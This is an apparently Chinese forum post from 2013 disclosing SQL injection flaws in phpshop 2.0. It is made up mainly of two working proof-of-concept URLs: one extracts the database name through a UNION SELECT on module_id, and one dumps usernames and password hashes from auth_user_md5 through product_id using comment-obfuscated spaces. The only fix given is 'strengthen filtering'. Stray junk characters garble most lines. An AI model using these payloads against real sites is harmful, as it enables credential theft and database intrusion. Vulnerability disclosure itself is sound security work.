标题 : phpshop 2.0 SQL Injection Vulnerability4 J+ T {5 x' N) ?
+ v- R) A% Z) b$ i
作者 : By onestree. K) x, @) Y, B, \0 ]
下载地址 : http://code.google.com/p/phpshop/downloads/list
8 r5 I! M2 R7 t; Q$ Z3 Z6 C; l* j测试地址: windows 7 / ubuntu9 q+ ^; w* N8 s- N0 ?! T
" Z( _' O0 A, I2 S1 R$ r
3 ]/ f5 g( A2 Q' S' r1 H gSQLi p0c:
1 d$ Z8 C0 Y; h1 k3 ]7 |" K
* K, M( @* ?1 y( A==================
: Y: L1 z9 Y- k2 X ! p$ Z+ F) Q* F/ d
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
0 I6 E9 d$ c6 M3 E3 `union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --, T# k- f3 A' ? t5 j1 o
& Y8 N" C2 X8 Q. i( {2 ?# x2 xhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--, i0 Y1 m) o7 G$ r
! Z) M9 t; F( U+ G/ w+ B
修复:* L: O8 u9 \, C3 v) |1 W6 u7 U/ H
加强过滤3 h, s7 l4 W1 g7 ]% J6 g, |
* C9 U k/ ` }: C4 H( e& `- O1 F, ]9 k3 p; |
|
发表于 2013-1-18 18:24:10
收藏
支持
反对